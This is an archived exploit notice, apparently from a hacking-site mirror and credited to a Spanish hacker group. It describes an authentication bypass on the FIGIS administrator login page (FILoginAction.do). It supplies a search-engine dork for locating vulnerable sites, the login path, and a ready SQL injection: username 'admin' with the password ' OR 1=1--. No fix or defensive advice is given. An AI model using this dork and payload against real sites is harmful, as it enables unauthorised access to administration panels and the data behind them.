AOH :: HP Unsorted F :: TB13590.HTM

FIGIS (FILogin.do) Bypass SQL Injection Vulnerability



FIGIS (FILogin.do) Bypass SQL Injection Vulnerability
FIGIS (FILogin.do) Bypass SQL Injection Vulnerability



# FIGIS (FILogin.do) Bypass SQL Injection Vulnerability
# Download:
# Not Available
# Bug found by Jose Luis G=F3ngora Fern=E1ndez / JosS
# Contact: sys-project[at]hotmail.com
# Spanish Hackers Team
# www.spanish-hackers.com
# /server irc.freenode.net /join #fullsecure
# d0rk: "accionado por FIGIS" / "powered by FIGIS"
# Stop lammer

# Admin Login:

../PATH/FILoginAction.do
http://example.com/fi/FILoginAction.do

# Simple - SQL Injection in Admin Login (Exploit)

User: admin
Password: ' OR 1=1--

 //---------------------------------------\\

Greetz To: All Hackers
Jose Luis G=F3ngora Fern=E1ndez / JosS!

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.